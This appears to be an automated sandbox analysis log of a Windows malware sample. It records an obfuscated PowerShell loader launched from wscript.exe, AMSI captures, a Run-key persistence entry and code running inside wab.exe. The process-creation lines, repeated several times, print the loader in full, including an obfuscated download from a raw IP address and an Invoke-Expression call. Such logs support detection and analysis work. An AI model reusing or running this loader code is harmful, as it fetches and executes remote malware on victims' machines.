Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Physiogony $Bomsejlenes $Djvlespils), (Goatsbeard132 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Porrerne = [AppDomain]::CurrentDomain.GetAssemblies()$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Mockage)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Sdladen, $false).DefineType($fredeliggjort, $Avnb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Sparkedragter)$global:Underkuedes = [System.Text.Encoding]::ASCII.GetString($Lizardfish)$global:Tzutuhil=$Underkuedes.substring(292461,28062)<#Armeredes Fortrstningens fennernes Gavt
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSk
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSk Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSk Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 13_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B891FEB push E95E5207h; ret 1_2_00007FFD9B891FE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B891DC5 push E95E5207h; ret 1_2_00007FFD9B891FE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B963444 pushfd ; iretd 1_2_00007FFD9B963445
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B961A59 push edx; ret 1_2_00007FFD9B961A65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B96191B push esp; ret 1_2_00007FFD9B96191C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0754DE0A push ss; ret 4_2_0754DE13
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_23021219 push esp; iretd 9_2_2302121A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_23012806 push ecx; ret 9_2_23012819
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044693D push ecx; ret 13_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00451D54 push eax; ret 13_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00444E71 push ecx; ret 14_2_00444E81
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00414060 push eax; ret 15_2_00414074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00414060 push eax; ret 15_2_0041409C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00414039 push ecx; ret 15_2_00414049
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Subtruncated Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Subtruncated Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_004047CB
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
